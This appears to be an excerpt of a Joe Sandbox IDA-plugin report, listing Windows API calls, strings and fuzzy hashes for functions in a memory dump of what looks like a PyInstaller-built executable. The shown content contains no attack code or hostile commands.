                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                          • API String ID: 190572456-3427451314
                                                                                                                                                                                                                          • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                          • Instruction ID: ebdf822f243a967f9777f26f4938f09610d36d8d15919acd2b159c0f6ec92864
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E19564A1DF87A0FBDBFB44AA501B423E9AF64761F941135C84E833E4EF7DA54B8204
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF641F27C97,?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F2782C
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F226C0: MessageBoxW.USER32 ref: 00007FF641F22736
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                          • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                          • Instruction ID: 1205b9d4a8794b4b05d6b2582e8ba1431f56c80081daf76bc07add8da14bccdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73419221B2DA8291FBE2FB24D9512FA73D1AFA4780F444431DA4EC36D6EE6DE5068340
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                          • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                          • Instruction ID: 23eb9f18a61af0c36d1522d4a532543ae216a45e76d66e396d63642e3beb53a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51F736618BA186D774AF26A4181BAB7A1F798B61F004131EFDE83795DF3CD046DB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                          • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                          • Instruction ID: 04420fb672afb040d2cf50076605535efed07623a94460eaabdfaaa4d9459c3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1912B361E0D24B86FBA6BA14D05427972D1FBC0750F984136D68A87EE4DF3CF5939B02
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                          • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                          • Instruction ID: 007eeee947f1ecfb85f09cf240f5b90c73416b07d560507c2711c85c469b89a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1129361A0C14B86FBA6BA14E0547BA72D1FB80754F944133DA8A87EC4DF3CE583DB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: 13b283e47d001d0ab3171adc0de6fd131dc6445b0413af453990f9875fb5be0d
                                                                                                                                                                                                                          • Instruction ID: 47ff2a3f61ccf2f784d674af3578dbfd82126bda13b9ca3fa887e2c1d02b8344
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13b283e47d001d0ab3171adc0de6fd131dc6445b0413af453990f9875fb5be0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD418C21B0C68642FBA2BB92A9405FAA3D1BB54BC4F544031DD4D87BD6EF3EE4078308
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: 1fec75a7a2eead9af1f1dd0893e9f937b3761287506d9b310f4ea8fdf1d5c513
                                                                                                                                                                                                                          • Instruction ID: 171ffaf35e7d3c65d70412a763a60c2270fbfa00c15cab0ce9641801f6c2caed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fec75a7a2eead9af1f1dd0893e9f937b3761287506d9b310f4ea8fdf1d5c513
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241AE21B0C68281FBA2BB55A9411FA63E0FF54794F484031DA4E87AD6EF3DE5078708
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                          • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                          • Instruction ID: dc37461c10ea2de66efa85340948f0c16f9f25f183db5203a40b7f5d145b8385
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D15C32A0CB8186EBA1BB6594403ED77E0FB55788F200135EA4D97BDADF39E492C741
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D06D
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D07B
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D0A5
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D113
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D11F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                          • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                          • Instruction ID: 7d85c24eef2a4c5b6555e8c5145ceb6ad1e945f041b2649673a5d1b4a6cc2003
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0318B21A1EA8281EB93FB56A8006A923D4FF48BA4F594535DD2D873D9EE3DE4478204
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                          • Instruction ID: 5c00632d4f0e97f41fc5477ef6f858e2cb9798f6284000220b84694d7053e2ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB211820B0C64A42FBEAB3269A4517D61C25F887B0F544734E93ECBEE7DE2CA4534702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                          • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                          • Instruction ID: 23378460c7ec4a14b04c8e9bb479f11e66fbd08f318460a1ff31d3e1aab34405
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118E31B2CA4286E792BB56E948329A2E0FB98BE4F004234EA1DC77D5DF3CD405C744
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2821D
                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2827A
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28305
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28364
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28375
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2838A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                          • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                                                          • Instruction ID: 56958c58e40fb4fb5a3dbb9ac5171d2a725aaef28e120fc482b4af5060bb8ced
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42418F72A1D6C281EBB2BB12A5042EA63D4FB85B80F844135DF9D977DADE3DE402C704
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A5E7
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A61D
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A64A
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A65B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A66C
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A687
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                          • Instruction ID: fc90cafcd80f745276c2dee56635485c1590386a05fe6af269c9a45ee2ae8915
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58110630B0C64A42FBDAB726965117D66C29F887A0F148734E83ECBED7DE2CA4535702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                          • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                          • Instruction ID: 7a79c833a04c94c959466f71197d0359a629a019eb156524635c70550ebfed61
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9318F32A1CA8689EB61FF61E8552F963A0FF89784F440135EA4D87B9ADF3CD106C701
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                          • API String ID: 1878133881-640379615
                                                                                                                                                                                                                          • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                          • Instruction ID: abb4f63d93d37dfeefe08b16f9ad6eaaa88f707d6a8cf1a1d49432c19fb20057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3215C7262CAC681E761FB50F4517EA63A4FB94784F400036EA8C83ADADF7CD646CB44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                          • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                          • Instruction ID: bcec700ecbcf5a0013aed16c01152070b5c52d426ea8734c623ebd66ea3f8ce7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F06271A1DB0681EB51BB64E85837953A0AF95761F940735C96DC76F5CF2CD04BC304
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
